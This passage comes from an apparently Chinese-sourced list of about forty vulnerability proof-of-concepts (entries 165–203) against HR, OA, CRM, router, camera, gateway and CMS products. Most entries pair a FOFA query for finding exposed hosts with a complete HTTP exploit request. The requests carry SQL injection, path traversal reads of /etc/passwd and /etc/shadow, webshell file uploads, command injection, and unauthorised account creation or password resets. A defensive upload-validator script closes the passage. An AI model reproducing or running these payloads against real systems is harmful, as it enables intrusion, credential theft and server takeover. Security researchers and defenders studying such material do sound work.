X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) Ticketing Management Platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. LVS Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. Tongtianxing (通天星) CMSV6 Vehicle Positioning and Monitoring Platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD License Plate Recognition Camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. Jianwen (建文) Engineering Management System arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) Enterprise Standardization Management System UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) Enterprise Standardization Management System AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib Library Cluster Management System updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao Technology (迅饶科技) X2Modbus Gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi (瑞友天翼) Application Virtualization System SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) Clinical Viewing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. Yisaitong (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian (云鉴) Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
First fetch a CSRF token:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Then submit the token; the param value is evaluated as Python on the server:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Verify by reading back the file written into the web root:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. Feiqi Hulian (飞企互联) FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value URL-decodes to `ls />/www/aaa.txt` (backtick command substitution), so the request needs a valid LuCI sysauth session and leaves its output in the web root.

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Request the login page to obtain the CSRF token, then obtain a session cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie (the PoC logs in as admin/admin):

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. Weiqing (微擎) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute the __VIEWSTATE and __EVENTVALIDATION values into the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
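Entries 192, 194, 199, 202 and 203 above all succeed on the same server-side mistakes: the client-supplied filename is trusted (its path separators in 194, its extension in 192/194/199/203), the declared Content-Type is trusted (203 labels a JSP as image/jpeg), and the stored file sits at a predictable path under the client's own name (199, 202). The validator below is an added example for defenders and product teams; it is not code from the original post or from any of the listed products. The extension whitelist and magic-byte table are assumptions chosen for illustration, and each check is commented with the PoC it defeats.

```python
import os
import posixpath
import re
import uuid

# Allowed extensions mapped to the magic bytes their content must start with.
# This whitelist is an assumption for the example; a deployment sets its own.
ALLOWED_TYPES = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".pdf":  (b"%PDF-",),
    ".txt":  (),            # no magic number; accepted on extension alone
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_.-]{1,100}$")


def check_upload(client_name: str, content: bytes):
    """Validate one uploaded file.

    Returns (accepted, reason, server_side_name). Only the bytes and the
    client-supplied filename are consulted; the client's Content-Type header
    is deliberately not a parameter because it is attacker-controlled.
    """
    # Entry 194: filename="../../../../../jboss/web/fe.war/hello.jsp".
    # Normalise both separator styles and refuse anything but a bare name.
    name = client_name.replace("\\", "/")
    if name != posixpath.basename(name) or ".." in name:
        return (False, "path separators or '..' in filename", None)

    # Entry 192: name=.ashx, an extension-only name that still maps to a
    # server-side handler. Also rejects dotfiles such as .htaccess.
    if not name or name.startswith("."):
        return (False, "extension-only or hidden filename", None)

    stem, ext = os.path.splitext(name)
    ext = ext.lower()          # hello.JSP must not slip past a lowercase list
    if not SAFE_STEM.match(stem):
        return (False, "unsafe characters in filename", None)

    # Entries 194/203 (.jsp) and 199 (.php): decide on the last extension
    # only, against a whitelist, never a blacklist of "dangerous" extensions.
    if ext not in ALLOWED_TYPES:
        return (False, f"extension {ext!r} not allowed", None)

    # Entry 203 sends Content-Type:image/jpeg with JSP source inside: the
    # declared type is ignored and the leading bytes are checked instead, which
    # also catches shell.jsp.jpg carrying non-image content.
    magics = ALLOWED_TYPES[ext]
    if magics and not any(content.startswith(m) for m in magics):
        return (False, "content does not match extension", None)

    # Entries 199/202 show the upload reachable at a predictable path under the
    # client's name; store under a server-generated name and keep the original
    # name only as metadata.
    return (True, "ok", f"{uuid.uuid4().hex}{ext}")


if __name__ == "__main__":
    # Filenames and bodies taken from the PoCs above, plus two benign uploads.
    samples = [
        ("../../../../../jboss/web/fe.war/hello.jsp", b'<% out.println("hello");%>'),
        (".ashx", b'<%@ WebHandler Language="C#" Class="AverageHandler" %>'),
        ("11.jsp", b'<% out.print("hello,eHR");%>'),
        ("tttt.php", b'<?php echo "tttt";unlink(__FILE__);?>'),
        ("shell.jsp.jpg", b"<% out.print(1); %>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
        ("1123.txt", b"Hello World!"),
    ]
    for fname, body in samples:
        print(fname, "->", check_upload(fname, body)[:2])
```

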